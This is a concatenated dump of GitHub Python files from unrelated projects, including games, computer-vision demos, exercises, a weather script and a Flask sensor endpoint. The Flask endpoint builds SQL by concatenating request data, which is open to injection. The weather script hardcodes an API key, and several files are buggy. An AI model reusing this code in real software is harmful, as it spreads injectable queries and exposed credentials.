bot.add_cog(TweetRepost(bot))\n","repo_name":"sskewer/Red-Cogs","sub_path":"tweetrepost/tweetrepost.py","file_name":"tweetrepost.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002082614","text":"# -*- coding: utf-8 -*-\n\"\"\"@package business.mall.regional\n用于填写收货地址时获取地区信息\n\n\"\"\"\n\nfrom business import model as business_model\nfrom db.mall import models as mall_models\n\n\nclass Regional(business_model.Model):\n\t\"\"\"用于填写收货地址时获取地区信息\n\t\"\"\"\n\n\tdef get_all_provinces(self):\n\t\tprovinces = {}\n\t\tfor province in mall_models.Province.select():\n\t\t\tprovinces[province.id] = province.name\n\t\treturn provinces\n\n\tdef get_cities_for_province(self, province_id):\n\t\tcities = {}\n\t\tfor city in mall_models.City.select().dj_where(province_id=province_id):\n\t\t\tcities[city.id] = city.name\n\t\treturn cities\n\n\tdef get_districts_for_city(self, city_id):\n\t\tdistricts = {}\n\t\tfor district in mall_models.District.select().dj_where(city_id=city_id):\n\t\t\tdistricts[district.id] = district.name\n\t\treturn districts\n","repo_name":"chengdg/apiserver","sub_path":"business/mall/regional.py","file_name":"regional.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38790332929","text":"def gen_fibanoci(n):\n a = 1\n b = 1\n output = []\n for i in range(n):\n output.append(a)\n a, b = b, a + b\n return output\n\n\nfor num in gen_fibanoci(10):\n print(num)\n\n\n# YIELD KEYWORD\nprint(\"\\n YIELD\")\n\n\ndef gencubes(n):\n for num in range(n):\n yield num**3\n\n\nfor x in gencubes(10):\n print(x)\n","repo_name":"Sahira-m/Python","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35651692210","text":"import json\nimport os\nimport re\n\nfileOfDirectory = os.listdir('.')\npattern = \"*.json\"\npattern_regex = r\"^www\"\nreplacement = ''\nfile_name = 'urls-para-troca.json'\nnew_file_name = 'www.json'\n\nnew_data = []\n\nwith open(file_name, encoding='utf-8') as f:\n data = json.load(f)\n for i in data:\n aux = re.search(pattern_regex, str(i['error_link']))\n\n if aux:\n print(i['error_link'])\n new_data.append(i)\n\n with open(new_file_name, 'w') as outfile:\n json.dump(new_data, outfile)\n","repo_name":"freakln/remomeia","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14593164229","text":"import cv2 as cv\nimport numpy as np\nfrom PIL import Image\nimport tensorflow as tf\nfrom tensorflow.keras import models\n\nclass Model:\n \n def __init__(self):\n self.eye_model = models.load_model(\"eye-model.h5\")\n self.yawn_model = models.load_model(\"yawn-model.h5\")\n\n self.face_cascade = cv.CascadeClassifier(cv.data.haarcascades + 'haarcascade_frontalface_default.xml')\n self.eye_cascade = cv.CascadeClassifier(cv.data.haarcascades + 'haarcascade_eye.xml')\n \n def image_segmentation(self):\n # img = Image.open('frames/frame.jpg')\n # img = img.resize((600, 400), Image.ANTIALIAS)\n # img.save('frames/face.jpg', 'JPEG', quality=95)\n\n img = cv.imread('frames/face.jpg')\n\n # face = self.face_cascade.detectMultiScale(img, 1.5, 1)\n\n # for (fx, fy, fw, fh) in face:\n\n # if fx:\n # print(\"Found a FACE\")\n\n # face_found = cv.rectangle(img, (fx, fy), (fx + fw, fy + fh), (255, 0, 0), 2) # def rectangle(img, pt1, pt2, color, thickness=None, lineType=None, shift=None)\n # # cv.putText(img,'Face',(fx-fw,fy-fh), font, 0.5, (0,255,255), 2, cv.LINE_AA)\n\n # # roi_gray = img[fy:fy+fw, fx:fx+fw]\n # roi_color = img[fy:fy+fw, fx:fx+fw]\n\n eyes = self.eye_cascade.detectMultiScale(img, 1.5, 2)\n\n for (ex, ey, ew, eh) in eyes:\n\n if ex:\n print(\"Found an EYE\")\n\n eye_found = cv.rectangle(img, (ex, ey), (ex + ew, ey + ew), (0, 255, 0), 1)\n\n eyes = img[ey:ey+ew, ex:ex+ew]\n # cv.imshow('Eyes', eyes)\n cv.imwrite('frames/eye.jpg', eyes)\n\n # img = Image.open('frames/eye.jpg')\n # img = img.resize((100, 100), Image.ANTIALIAS)\n # os.remove('frames/eye100.jpg')\n # img.save('frames/eye100.jpg', 'JPEG', quality=95)\n\n # # converting to gray, blur it, and find edges\n # gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n # gray = cv.GaussianBlur(gray, (5,5), 0)\n # edged = cv.Canny(gray, 75, 200) # image, threshold1, threshold2\n\n\n # cv.imshow('Image', img)\n # cv.waitKey()\n\n def predict(self):\n\n self.image_segmentation()\n # For Eyes\n class_names = ['closed', 'open']\n img = cv.imread('frames/eye.jpg')\n dimensions = (100, 100)\n img = cv.resize(img, dimensions)\n # img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n img = tf.keras.applications.vgg16.preprocess_input(img)\n prediction = self.eye_model.predict(np.array([img]))\n index = np.argmax(prediction) # Getting the argument of maximum value(the greatest of all values generated by the neurons)\n\n eye_prediction = class_names[index]\n print(eye_prediction)\n if eye_prediction == \"closed\":\n return \"drowsy\"\n else:\n pass\n\n # For Eyes\n class_names = ['no_yawn', 'yawn']\n img = cv.imread('frames/face.jpg')\n dimensions = (600, 400)\n img = cv.resize(img, dimensions)\n # img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n img = tf.keras.applications.vgg16.preprocess_input(img)\n prediction = self.yawn_model.predict(np.array([img]))\n index = np.argmax(prediction) # Getting the argument of maximum value(the greatest of all values generated by the neurons)\n\n yawn_prediction = class_names[index]\n print(yawn_prediction)\n if yawn_prediction == \"yawn\":\n return \"drowsy\"\n else:\n return \"attentive\"\n \n # returning status according to the prediction\n if flag:\n return \"drowsy\"\n else:\n return \"attentive\"","repo_name":"codewithpandey/driver-drowsiness-detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37111103293","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('./photos/robert.jpg')\n\nkernel = np.ones((5,5), np.uint8)\n\n# This increases the thickness of the image\nimgDilation = cv2.dilate(img, kernel, iterations=1)\n\ncv2.imshow(\"Original image\", img)\ncv2.imshow(\"Dilated image\", imgDilation)\n\ncv2.waitKey(0)","repo_name":"Sreekar-Tammana/opencv-programs","sub_path":"dilation.py","file_name":"dilation.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22039608867","text":"import requests\r\n#import os\r\nfrom datetime import datetime\r\n\r\napi_key = '1f4222114e239c77af03764e4e233e6f'\r\nlocation = input(\"Enter the city name: \")\r\n\r\ncomplete_api_link = \"https://api.openweathermap.org/data/2.5/weather?q=\"+location+\"&appid=\"+api_key\r\napi_link = requests.get(complete_api_link)\r\napi_data = api_link.json()\r\n\r\n#create variables to store and display data\r\ntemp_city =((api_data['main']['temp']) - 273.15)\r\nweather_desc = api_data['weather'][0]['description']\r\nhmdt = api_data['main']['humidity']\r\nwind_spd = api_data['wind']['speed']\r\ndate_time = datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n\r\nprint (\"-------------------------------------------------------------\")\r\nprint (\"Weather Stats for - {} || {}\".format(location.upper(), date_time))\r\nprint (\"-------------------------------------------------------------\")\r\n\r\nprint (\"Current temperature is: {:.2f} deg C\".format(temp_city))\r\nprint (\"Current weather desc :\",weather_desc)\r\nprint (\"Current Humidity :\",hmdt, '%')\r\nprint (\"Current wind speed :\",wind_spd ,'kmph')\r\nwith open('weather record.txt', 'w') as f:\r\n f.writelines(location)\r\nwith open('weather record.txt', 'a') as f:\r\n f.writelines('\\n'.join(weather_desc))\r\nwith open('weather record.txt', 'a') as f:\r\n f.writelines('\\n'.join(temp_city))\r\nwith open('weather record.txt', 'a') as f:\r\n f.writelines('\\n'.join(hmdt))\r\nwith open('weather record.txt', 'a') as f:\r\n f.writelines('\\n'.join(wind_spd))\r\n","repo_name":"siri1904/shapaiproject","sub_path":"shapaiproject.py","file_name":"shapaiproject.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21840538197","text":"from flask import Flask, request\r\nimport json, sqlite3\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef getSensor():\r\n json_dict = request.json\r\n\r\n # get station sensor data array\r\n sensor_array = json_dict['data']\r\n\r\n conn = sqlite3.connect('capteur.db') # Connexion à la DB\r\n cur = conn.cursor() # initialisation d'un curseur pour la DB\r\n print(\"Connected to SQLite DB\")\r\n\r\n print(\"Detected {} sensors\".format(len(sensor_array)))\r\n for i, sensor in enumerate(sensor_array):\r\n print(\"***Sensor {}***\".format(i + 1))\r\n print(\"date_added : {}\".format(sensor['DateAjout']))\r\n print(\"sensor_id : {}\".format(sensor['IdCapteur']))\r\n print(\"value : {}\".format(sensor['Valeur']))\r\n cur.execute(\"INSERT INTO SensorReading (SensorId,DateAdded,Value) VALUES('\" + format(\r\n sensor['DateAjout']) + \"',\" + format(sensor['IdCapteur']) + \",\" + format(sensor['Valeur']) + \");\")\r\n conn.commit()\r\n cur.close()\r\n conn.close()\r\n print(\"Connection to SQLite DB closed\")\r\n\r\n # send an acknowledgement message to station\r\n return \"Transfer Success\"\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\", port=5050)\r\n","repo_name":"JardinsBruyere/Serveur","sub_path":"listen.py","file_name":"listen.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74996968052","text":"\"\"\"\nPlatform Tools: logo-upload\n\"\"\"\nimport os\nimport uuid\nfrom typing import Optional, Union\n\nfrom hopeit.app.api import event_api\nfrom hopeit.app.context import EventContext, PreprocessHook\nfrom hopeit.app.logger import app_extra_logger\nfrom hopeit.dataobjects import BinaryAttachment\n\nfrom app0.admin.util.object_storage import ObjectStorage, ObjectStorageConf, ObjectStorageConnConfig\nfrom app0.admin.file import PlatformFile\n\nlogger, extra = app_extra_logger()\nobject_store: Optional[ObjectStorage] = None\n\n__steps__ = ['put_object']\n__api__ = event_api(\n fields=[('attachment', BinaryAttachment)],\n responses={\n 200: (PlatformFile, \"Uploaded file info\"),\n 400: (str, \"Missing or invalid fields\")\n }\n)\n\n\nasync def __init_event__(context: EventContext):\n global object_store\n if object_store is None:\n config: ObjectStorageConnConfig = context.settings(key='data_store', datatype=ObjectStorageConnConfig)\n bucket: ObjectStorageConf = context.settings(key='res_images', datatype=ObjectStorageConf)\n object_store = await ObjectStorage().connect(conn_config=config, bucket=bucket.bucket)\n\n\n# pylint: disable=invalid-name\nasync def __preprocess__(payload: None, context: EventContext,\n request: PreprocessHook) -> Union[str, PlatformFile]:\n assert object_store\n uploaded_file: PlatformFile = None # type: ignore\n async for file_hook in request.files():\n _, fextension = os.path.splitext(file_hook.file_name)\n file_name = f\"{str(uuid.uuid4())}{fextension}\"\n logger.info(context, f\"Saving {file_name}...\")\n file_info = await object_store.store_streamed_file(file_name=file_name, file_hook=file_hook)\n if file_info:\n uploaded_file = PlatformFile(\n file_info.bucket, file_info.file_name, file_hook.size, file_hook.file_name, file_name)\n args = await request.parsed_args()\n if not all(x in args for x in ['attachment']):\n request.status = 400\n return \"Missing required fields\"\n return uploaded_file\n\n\nasync def put_object(payload: PlatformFile, context: EventContext) -> PlatformFile:\n return payload\n","repo_name":"fhernand23/stateless-microservices-platform","sub_path":"app0-admin/app0-admin/src/app0/admin/api/logo_upload.py","file_name":"logo_upload.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2025960356","text":"import pygame\nimport neat\nimport time\nimport os\nimport random\npygame.font.init()\n# SET DIMENSION OF SCREEN\n\nWIN_WIDTH = 500\nWIN_HEIGHT = 800\n\n# LOAD THE IMAGES:\n# scale2x makes the image twice as big.\n\nBIRD_IMGS = [pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird1.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird2.png\"))),\n pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bird3.png\")))]\nPIPE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"pipe.png\")))\nBASE_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"base.png\")))\nBG_IMG = pygame.transform.scale2x(pygame.image.load(os.path.join(\"imgs\", \"bg.png\")))\n\nSTAT_FONT = pygame.font.SysFont(\"comicsans\", 50) # font of score\n\n# Generate one bird to test out:\n# Create Bird class:\n\nclass Bird:\n IMGS = BIRD_IMGS\n MAX_ROTATION = 25 # HOW MUCH BIRD IS GOING TO TILT\n ROT_VEL = 20 # HOW MUCH WE ARE GOING TO ROTATE ON EACH FRAME\n ANIMATION_TIME = 5 # HOW LONG WE ARE SHOWING EACH BIRD ANIMATION\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.tilt = 0 # initialize at 0 because our bird will start flat\n self.tick_count = 0\n self.vel = 0 # velocity starts at 0 because it is not moving\n self.height = self.y\n self.img_count = 0 #shows which image is currenlty showing of bird\n self.img = self.IMGS[0] # going to reference the first image in BIRD_IMGS\n\n def jump(self):\n self.vel = -10.5 #bird velocity\n self.tick_count = 0 # keep count of when we last jump, we need to reset it to 0\n self.height = self.y\n\n def move(self):\n self.tick_count += 1 # a tick happend\n\n displacement = self.vel*self.tick_count + 1.5*self.tick_count**2\n\n if displacement >= 16:\n displacement = 16\n\n if displacement < 0:\n displacement -= 2\n\n self.y = self.y + displacement\n\n if displacement < 0 or self.y < self.height + 50:\n if self.tilt < self.MAX_ROTATION:\n self.tilt = self.MAX_ROTATION\n else:\n if self.tilt > -90:\n self.tilt -= self.ROT_VEL\n\n def draw(self, win):\n self.img_count += 1\n\n if self.img_count < self.ANIMATION_TIME:\n self.img = self.IMGS[0]\n elif self.img_count < self.ANIMATION_TIME*2:\n self.img = self.IMGS[1]\n elif self.img_count < self.ANIMATION_TIME*3:\n self.img = self.IMGS[2]\n elif self.img_count < self.ANIMATION_TIME*4:\n self.img = self.IMGS[1]\n elif self.img_count < self.ANIMATION_TIME*4 + 1:\n self.img = self.IMGS[0]\n self.img_count = 0\n\n if self.tilt <= -80:\n self.img = self.IMGS[1]\n self.img_count = self.ANIMATION_TIME*2\n\n rotated_image = pygame.transform.rotate(self.img, self.tilt)\n new_rectangle = rotated_image.get_rect(center = self.img.get_rect(topleft = (self.x, self.y)).center)\n win.blit(rotated_image, new_rectangle.topleft)\n\n def get_mask(self):\n return pygame.mask.from_surface(self.img)\n\n\nclass Pipe:\n GAP = 200\n VEL = 5\n\n def __init__(self, x):\n self.x = x\n self.height = 0\n\n self.top = 0\n self.bottom = 0\n self.PIPE_TOP = pygame.transform.flip(PIPE_IMG, False, True) # flips the image upside down\n self.PIPE_DOWN = PIPE_IMG\n\n self.passed = False\n self.set_height() # how tall are the pipes\n\n def set_height(self):\n self.height = random.randrange(50 ,450)\n self.top = self.height - self.PIPE_TOP.get_height()\n self.bottom = self.height + self.GAP\n\n def move(self):\n self.x -= self.VEL\n\n def draw(self, win):\n win.blit(self.PIPE_TOP, (self.x, self.top))\n win.blit(self.PIPE_DOWN, (self.x, self.bottom))\n\n def collide(self, bird):\n bird_mask = bird.get_mask()\n top_mask = pygame.mask.from_surface(self.PIPE_TOP)\n bottom_mask = pygame.mask.from_surface(self.PIPE_DOWN)\n\n top_offset = (self.x - bird.x, self.top - round(bird.y))\n bottom_offset = (self.x - bird.x, self.bottom - round(bird.y))\n\n b_point = bird_mask.overlap(bottom_mask, bottom_offset) # tells us point of collision bw bird and pipe\n t_point = bird_mask.overlap(top_mask, top_offset)\n\n if t_point or b_point:\n return True\n\n return False\n\n\nclass Base:\n VEL = 5\n WIDTH = BASE_IMG.get_width()\n IMG = BASE_IMG\n\n def __init__(self, y):\n self.y = y\n self.x1 = 0\n self.x2 = self.WIDTH\n\n def move(self):\n self.x1 -= self.VEL\n self.x2 -= self.VEL\n\n if self.x1 + self.WIDTH < 0:\n self.x1 = self.x2 + self.WIDTH\n if self.x2 + self.WIDTH < 0:\n self.x2 = self.x1 + self.WIDTH\n\n def draw(self, win):\n win.blit(self.IMG, (self.x1, self.y))\n win.blit(self.IMG, (self.x2, self.y))\n\n\n# create windows where it will display\ndef draw_window(win, birds, pipes, base, score):\n win.blit(BG_IMG, (0, 0))\n for pipe in pipes:\n pipe.draw(win)\n\n text = STAT_FONT.render(\"Score: \" + str(score), 1, (255, 255, 255))\n win.blit(text, (WIN_WIDTH - 10 - text.get_width(), 10))\n base.draw(win)\n\n for bird in birds:\n bird.draw(win)\n pygame.display.update()\n\n\n# run main loop of game\ndef main(genomes, config):\n nets = []\n ge = []\n birds = []\n\n# the reason why we put the '_' in the _, g for loop is because genome is a tuple (1, ge[0]), (2, ge[1]), (3, ge[2])\n# and we only want the value of ge[x], not the first value which states the location.\n for _, g in genomes:\n net = neat.nn.FeedForwardNetwork.create(g, config)\n nets.append(net)\n birds.append(Bird(230, 350))\n g.fitness = 0\n ge.append(g)\n\n\n base = Base(730)\n pipes = [Pipe(500)]\n win = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))\n clock = pygame.time.Clock()\n\n score = 0\n\n run = True\n while run:\n clock.tick(30)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n pygame.quit()\n quit()\n\n pipe_ind = 0\n if len(birds) > 0:\n if len(pipes) > 1 and birds[0].x > pipes[0].x + pipes[0].PIPE_TOP.get_width():\n pipe_ind = 1\n else:\n run = False\n break\n\n for x, bird in enumerate(birds):\n bird.move()\n ge[x].fitness += 0.1\n\n output = nets[x].activate((bird.y, abs(bird.y - pipes[pipe_ind].height), abs(bird.y - pipes[pipe_ind].bottom)))\n\n if output[0] > 0.5:\n bird.jump()\n\n add_pipe = False\n rem = []\n for pipe in pipes:\n for x, bird in enumerate(birds):\n if pipe.collide(bird):\n ge[x].fitness -= 1\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n if not pipe.passed and pipe.x < bird.x:\n pipe.passed = True\n add_pipe = True\n\n if pipe.x + pipe.PIPE_TOP.get_width() < 0:\n rem.append(pipe)\n\n pipe.move()\n\n if add_pipe:\n score += 1\n for g in ge:\n g.fitness += 5\n pipes.append(Pipe(500))\n\n for r in rem:\n pipes.remove(r)\n\n for x, bird in enumerate(birds):\n if bird.y + bird.img.get_height() >= 730 or bird.y < 0:\n birds.pop(x)\n nets.pop(x)\n ge.pop(x)\n\n #bird.move()\n base.move()\n draw_window(win, birds , pipes, base, score)\n\n\n\ndef run(config_path):\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n\n p = neat.Population(config)\n\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n\n winner = p.run(main,50)\n\n\nif __name__ == \"__main__\":\n local_directory = os.path.dirname(__file__)\n config_path = os.path.join(local_directory, \"config-feedforward.txt\")\n run(config_path)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"machevres6/Flappy_Bird_AI","sub_path":"flappy_bird.py","file_name":"flappy_bird.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38282581978","text":"'''\nDesafio 061:\nRefaça o Desafio 051, lendo o primeiro termo e a razão de uma PA, mostrando os\n10 primeiros termos da progressão usando a estrutura while.\n'''\nfrom time import sleep\n\ndef isfloat(i):\n try:\n i = float(i)\n return True\n except:\n return False\n\n\nprint('+ ' * 17 + '+')\nprint(' Arithmetic Progression Calculator ')\nprint('+ ' * 17 + '+')\n\n\nwhile True:\n print('Enter the fist value:')\n v = input('> ').strip()\n if isfloat(v) and float(v) > 0:\n v = float(v)\n break\n else:\n print('Invalid Value!\\n')\n continue\nwhile True:\n print('Enter the difference:')\n d = input('> ').strip()\n if isfloat(d):\n d = float(d)\n break\n else:\n print('Invalid Value!\\n')\n continue\n\nc = 0\nsum = 0\nwhile c < 10:\n sum += (v + (d * c))\n print('{:.1f}'.format(v + (d * c)), end='')\n sleep(0.3)\n print(' → ' if c < 9 else '', end='')\n c += 1\n\nprint('\\nThe sum of that AP is: {}.'.format(sum))\n","repo_name":"marcosdemelo00/Python-Exercises-CursoemVideo","sub_path":"World 2 - ex036 to ex071/ex061 - Progressão Aritimética v2.0 (Arithmetic Progression v2.0).py","file_name":"ex061 - Progressão Aritimética v2.0 (Arithmetic Progression v2.0).py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73310321334","text":"import random\nimport uuid\nimport time\nimport copy\nfrom npc import Npc\nfrom twisted.internet import task\nfrom twisted.python import log\nimport ConfigParser\n\nclass NpcSpawn:\n\n\n def __init__(self, name, x, y, w, h, zone, spawn_max, spawn_delay, world):\n \n self.name = name\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.zone = zone\n self.spawn_max = spawn_max\n self.spawn_delay = spawn_delay\n self.world = world\n self.spawn_count = 0\n\n # Schedule update task\n self.spawn_task = task.LoopingCall(self.spawn)\n self.spawn_task.start(self.spawn_delay, now=False)\n \n log.msg( \"Loaded NPC SPAWN %s\" % self.name )\n\n def spawn(self):\n\n if self.spawn_count < self.spawn_max:\n x = random.randint(self.x, self.x + self.w)\n y = random.randint(self.y, self.y + self.h)\n \n # Create npc\n Npc(self.name, x, y, self.zone, self.world, self)\n \n self.spawn_count += 1\n \n","repo_name":"dslice25/tinymmo-server","sub_path":"server/world/npcspawn.py","file_name":"npcspawn.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74319086131","text":"import pandas as pd \nimport json \nimport networkx as nx\nimport matplotlib.pyplot as plt \nimport numpy as np \n\ndef print_graph(df: pd.DataFrame, title: str='', save_loc: str='', no_other: bool=False, no_loop: bool=False):\n\n if no_other:\n df = df.drop(axis=0, labels=['other'])\n df = df.drop(axis=1, labels=['other'])\n if no_loop:\n n = df.to_numpy() \n np.fill_diagonal(n, 0.0) \n df = pd.DataFrame(data=n, columns=df.columns, index=df.index)\n\n plt.figure() \n cols = df.columns\n df.columns = list(range(len(df.columns))) \n df.index = list(range(len(df.index)))\n\n edge_list = [] \n max_weight = df.max().max() \n\n for c in df.columns: \n for i in df.index:\n weight = ((df.loc[i, c])/max_weight)\n #weight = (df.loc[i, c])\n edge_list.append({'from': c, 'to': i, 'weight': weight}) \n \n edge_list = pd.DataFrame(edge_list)\n print(edge_list.max())\n \n G = nx.from_pandas_edgelist(edge_list, source='from', target='to', edge_attr='weight')\n pos = nx.circular_layout(G) # positions for all nodes\n \n # nodes\n nx.draw_networkx_nodes(G, pos, node_size=100)\n\n # edges\n edges = G.edges()\n weights = [G[u][v]['weight'] for u,v in edges]\n nx.draw_networkx_edges(G, pos, width=weights)\n nx.draw_networkx_labels(G, pos, {k: k for k in df.columns}, font_size=16)\n\n for i, c in enumerate(cols):\n print(f'{c}: {i}')\n\n if save_loc!='':\n plt.title(title)\n plt.tight_layout()\n plt.savefig(save_loc, format=\"PNG\")\n \n\n\ndef fetch_top_users_from_file(subreddit: str) -> list:\n json_top_users = json.load(open('scalp/cache/top_users.json', 'r'))\n set_top_users = set() \n try:\n for d_type in json_top_users[subreddit].keys():\n for date in json_top_users[subreddit][d_type].keys():\n fetchable_top = [a[0] for a in json_top_users[subreddit][d_type][date]['fetchable']]\n set_top_users = set_top_users | set(fetchable_top)\n except Exception as e:\n pass \n\n return list(set_top_users)\n\ndef fetch_rand_users_from_file(subreddit: str) -> list:\n json_users = json.load(open('scalp/cache/rand_users.json', 'r')) \n return json_users[subreddit]","repo_name":"Caizoo/Reddit","sub_path":"migration/migrate_helper.py","file_name":"migrate_helper.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70255324852","text":"from collections import deque\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmap = [list(map(int, input().split())) for _ in range(N)]\n\ndef bfs(y,x):\n q = deque([(y,x)])\n while q:\n ey, ex = q.popleft()\n chk[ey][ex] = True\n if map[ey][ex] != 0:\n for k in range(4):\n ny = ey + dy[k]\n nx = ex + dx[k]\n if 0 <= ny < N and 0 <= nx < M and chk[ny][nx] == False:\n chk[ny][nx] = True\n q.append((ny,nx))\n return 1\n\nreps = 0 #년수 체크\n# 주변 탐색을 위한 방향벡터 설정\ndy = [0, 1, 0, -1]\ndx = [1, 0, -1, 0]\nnode_chk = [[False] * M for _ in range(N)]\n\nwhile 1:\n reps += 1\n for j in range(N):\n for i in range(M):\n if map[j][i] == 0 and node_chk[j][i] == False:\n for k in range(4):\n nj = j + dy[k]\n ni = i + dx[k]\n if 0 <= nj < N and 0 <= ni < M:\n if map[nj][ni] != 0:\n map[nj][ni] -= 1\n node_chk[nj][ni] = True\n \n chk = [[False]*M for _ in range(N)]\n cnt = 0\n for j in range(N):\n for i in range(M):\n if map[j][i] != 0 and chk[j][i] == False:\n chk[j][i] = True\n cnt += bfs(j,i)\n if cnt >= 2:\n break\n\n# for j in range(N):\n# for i in range(M):\n# print(map[j][i], end='')\n# print()\nprint(reps)\n\n\n# 시간초과 안나오는 답, 출처 : https://velog.io/@hygge/Python-%EB%B0%B1%EC%A4%80-2573-%EB%B9%99%EC%82%B0-BFS\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\n\ndef bfs(x, y):\n q = deque([(x, y)])\n visited[x][y] = 1\n seaList = []\n\n while q:\n x, y = q.popleft()\n sea = 0\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m:\n if not graph[nx][ny]:\n sea += 1\n elif graph[nx][ny] and not visited[nx][ny]:\n q.append((nx, ny))\n visited[nx][ny] = 1\n if sea > 0:\n seaList.append((x, y, sea))\n for x, y, sea in seaList:\n graph[x][y] = max(0, graph[x][y] - sea)\n\n return 1\n\n\nn, m = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\n\nice = []\nfor i in range(n):\n for j in range(m):\n if graph[i][j]:\n ice.append((i, j))\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nyear = 0\n\nwhile ice:\n visited = [[0] * m for _ in range(n)]\n delList = []\n group = 0\n for i, j in ice:\n if graph[i][j] and not visited[i][j]:\n group += bfs(i, j)\n if graph[i][j] == 0:\n delList.append((i, j))\n if group > 1:\n print(year)\n break\n ice = sorted(list(set(ice) - set(delList)))\n year += 1\n\nif group < 2:\n print(0)\n\n\nimport sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\nmap = [list(map(int, input().split())) for _ in range(N)]\n\nice = []\nfor j in range(N):\n for i in range(M):\n ice.append((j,i))\nprint(ice)","repo_name":"vfrnji124/algorithm_practice","sub_path":"Baekjoon/BAEKJOON2573_빙산_0306_01.py","file_name":"BAEKJOON2573_빙산_0306_01.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4186148804","text":"\"\"\"\nLet's test your coding skills!\nTake a string as input and output each letter of the string on a new line, repeated N times, where N is the position of the letter in the string.\n\"\"\"\n# My variant\nstring = input()\ncount = 0\nfor i in string:\n print(i*(count+1))\n count+=1\n\"\"\"\nSololearn variant\nword = input()\nprint()\ni = 0\nwhile (i < len(word)):\n print(word[i]*(i+1))\n i+=1 \n #i++ - habit from C++ syntax\n \"\"\"\n","repo_name":"EMiheeva/Study_Python","sub_path":"Sololearn_Python_Data_Structure/Working with strings/4.2 String Operations. Practice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23340140390","text":"# Based on https://github.com/hrshtv/pytorch-lmu\n\nimport numpy as np\nimport torch\nfrom scipy.signal import cont2discrete\nfrom torch import fft, nn\nfrom torch.nn import functional as F\nfrom torch.nn import init\n\n\ndef leCunUniform(tensor):\n \"\"\"\n LeCun Uniform Initializer\n \"\"\"\n fan_in = init._calculate_correct_fan(tensor, \"fan_in\")\n limit = np.sqrt(3.0 / fan_in)\n init.uniform_(\n tensor, -limit, limit\n ) # fills the tensor with values sampled from U(-limit, limit)\n\n\nclass LMUCell(nn.Module):\n \"\"\"LMU Cell.\n\n Parameters:\n input_size (int) :\n Size of the input vector (x_t)\n hidden_size (int) :\n Size of the hidden vector (h_t)\n memory_size (int) :\n Size of the memory vector (m_t)\n theta (int) :\n The number of timesteps in the sliding window that is\n represented using the LTI system\n learn_a (boolean) :\n Whether to learn the matrix A (default = False)\n learn_b (boolean) :\n Whether to learn the matrix B (default = False)\n \"\"\"\n\n def __init__(\n self, input_size, hidden_size, memory_size, theta, learn_a=False, learn_b=False\n ):\n super(LMUCell, self).__init__()\n\n 